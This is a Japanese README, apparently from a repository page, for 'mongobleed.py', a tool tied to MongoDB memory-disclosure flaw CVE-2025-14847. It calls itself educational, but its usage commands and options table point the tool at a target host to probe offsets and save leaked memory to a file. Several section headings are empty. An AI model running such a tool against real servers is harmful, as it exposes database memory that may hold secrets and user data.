
CVE-2025-14847で示されるMongoDBのBSON圧縮解除におけるメモリ開示を実演する教育研究ツール。脆弱性分析のための境界チェックの失敗やメモリ安全性の概念をシミュレートします。
このリポジトリは、MongoDBのBSON展開実装で発見された重大な脆弱性CVE-2025-14847の背後にあるメモリ安全概念を実証するための教育研究ツールを含んでいます。このツールは、展開中の不適切な境界チェックがどのようにメモリ開示につながるかをシミュレートします。
このツールは以下を示します:
前提条件
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>
# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000
# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000
この脆弱性はデータベースセキュリティにおける広範な問題を浮き彫りにします:
公式リソース:
| オプション | デフォルト | 説明 |
|---|
--host | localhost | ターゲットMongoDBホスト |
--port | 27017 | ターゲットMongoDBポート |
--min-offset | 20 | プローブする最小ドキュメント長 |
--max-offset | 8192 | プローブする最大ドキュメント長 |
--output | leaked.bin | 漏洩データの出力ファイル |